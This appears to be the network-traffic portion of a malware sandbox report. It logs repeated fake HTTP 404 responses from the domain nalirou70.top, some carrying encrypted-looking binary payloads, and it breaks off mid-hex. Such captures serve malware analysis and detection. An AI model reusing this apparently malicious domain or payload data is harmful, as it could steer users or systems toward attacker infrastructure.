Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:20:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:20:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 1a ff b5 98 ff ac 18 a8 19 88 2c b4 59 52 db 03 f8 e5 2c f3 65 00 48 eb ac e3 1e bb 52 df 46 d2 f7 21 80 2a 80 ae 95 50 2a f8 e3 00 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 45I:82OU&,YR,eHRF!*P*~0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 1a ff b5 98 ff ac 18 a8 19 88 2c b4 59 52 db 03 f8 e5 2c f3 65 00 48 ec a9 e3 1e bb 52 df 41 df fb 2f 8c 20 80 ab 93 51 2e f8 e3 00 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 45I:82OU&,YR,eHRA/ Q.~0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 1a ff b5 98 ff ac 18 a8 19 88 2c b4 59 52 db 03 f8 e5 2c f3 65 04 4b ed af e3 1e bb 52 df 41 de fe 2e 8d 2a 80 aa 96 50 2b f8 e3 00 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 45I:82OU&,YR,eKRA.*P+~0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 61 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 86 4c 02 71 17 e9 f7 dc fc be 1e b4 53 dd 6e b6 46 4f da 00 e9 ec 0d 0a 30 0d 0a 0d 0a Data Ascii: 2aI:82OLqSnFO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 